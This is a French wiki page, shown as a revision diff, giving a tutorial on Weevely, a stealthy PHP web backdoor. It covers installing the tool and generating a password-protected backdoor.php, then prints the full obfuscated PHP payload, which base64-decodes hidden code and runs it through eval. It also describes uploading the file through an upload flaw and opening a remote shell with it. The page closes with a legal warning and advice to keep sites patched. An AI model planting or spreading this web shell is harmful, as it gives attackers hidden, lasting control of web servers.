Outils pour utilisateurs

Outils du site


weevely

Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

weevely [2016/08/24 18:58] (Version actuelle)
Ligne 1: Ligne 1:
 +===== Description =====
 +
 +Weevely est un backdoor discret en PHP qui simule une connexion telnet-like.
 +
 +Site de téléchargement: ​
 +[[http://​epinna.github.io/​Weevely/​]]
 +
 +===== Installation =====
 +
 +Weevely est inclus dans les distributions Linux de pentesting BackBox, BackTrack, Blackbuntu et bien sur dans les dépôts de Kali Linux.
 +
 +  apt-get install weevely
 +
 +Pour les autres distributions:​
 +
 +  wget http://​epinna.github.com/​Weevely/​downloads/​weevely-1.01.tar.gz
 +
 +Une simple extraction suffit.
 +
 +  tar -xvzf weevely-1.01.tar.gz
 +
 +===== Usage =====
 +
 +Rendez vous dans le menu "​Applications -> Kali Linux -> Maintaining Acces -> Web backdoors -> weevely.
 +
 +Le menu d'aide s'​affichera il suffira le lire pour utiliser weevely
 +
 +
 +Générez le backdoor en lui donnant un nom finissant par .php et en lui attribuant un mot de passe.
 +
 +  weevely generate password backdoor.php
 +
 +weevely créera un fichier .php
 +
 +<​code>​[>​]file backdoor.php ​
 +backdoor.php:​ PHP script, ASCII text</​code>​
 +
 +Contenant un code php cripté.
 +
 +  cat backdoor.php
 +
 +Que voici pour mon fichier test.
 +
 +<​PHP><?​php ​
 +$np = "​bhahsheh64h_hdechohdhe";​
 +$lw2="​oJ2Vycm9yX2xvbgZycbgsICcvZGV2L251bGwnKTskaz0bgnc3N3b3bgJkJztlY2hvICc8Jy4kay4nbgPicbg7ZXZhbgbChiYXNlNjRfbgZGV";​
 +$lw3="​jb2RlKHByZWdfcmVwbGFjZShhbgcnJbghebgSgbgnbgL1tbgeXHc9XHNdLycsJy9ccy8nKSwgYXJyYbgXkbgoJycsbgJysnbgKS";​
 +$fuf = "​str_replace";​
 +$lw4="​wgambg9pbgbihhcnJheV9bgzbgbbgGljZSgkYbgSwkYygkbgYSktMykbgpKbgSkpObg2bgVbgjaG8gJbgzwvJy4kay4nPic7fQ==";​
 +$lw1="​JGM9J2NvbgdW5bg0JzskYT0kX0NPT0tJRTtpZihyZXNbgldCgkYSk9PSdwYScgJiYgJGMoJGEpPjMpe2lubgaV9bgzZXbgQ";​
 +$np = $fuf("​h",​ "",​ $np);
 +eval($np($fuf("​bg",​ "",​ $lw1.$lw2.$lw3.$lw4))); ​
 +?></​PHP>​
 +
 +Uploadez votre backdoor sur le site test, normalement une simulation de faille upload est nécessaire.
 +
 +:!: Ce n'est pas un site de hacking, nous passerons donc les détail de la faille upload.
 +
 +Puis connectez vous a votre backdoor.
 +
 +  weevely.py http://​www.coyotus.com/​save/​backdoor.php password
 +
 +Et utiliser les commandes voulues dans votre shell distant.
 +Exemple:
 +
 +  coyotus@web007.240.ha.0vh.net:/​homez.93/​coyotus/​www/​save$ touch backdoortest.txt
 +
 +===== Conclusion =====
 +
 +Mettez régulièrement votre site php à jour et consulter les bulletins de sécurité de votre site afin de ne pas laissez échapper une faille upload dessus.
 +
 +:!: Le test à entièrement été effectué sur mon hébergement personnel, et les fichier ont été depuis lors supprimé.
 +Nul n'est sensé ignorer la loi, tout usage sur un server ne vous appartenant pas est passible de poursuite judiciaire résultant de lourdes peines de prisons.
 +
 +===== Vidéo =====
 +
 +{{youtube>​3ILY670721A?​medium}}
 +
 +==Voir aussi==
 +
 +  * **(en)** [[https://​github.com/​epinna/​Weevely/​wiki/​Tutorial]]
  
weevely.txt · Dernière modification: 2016/08/24 18:58 (modification externe)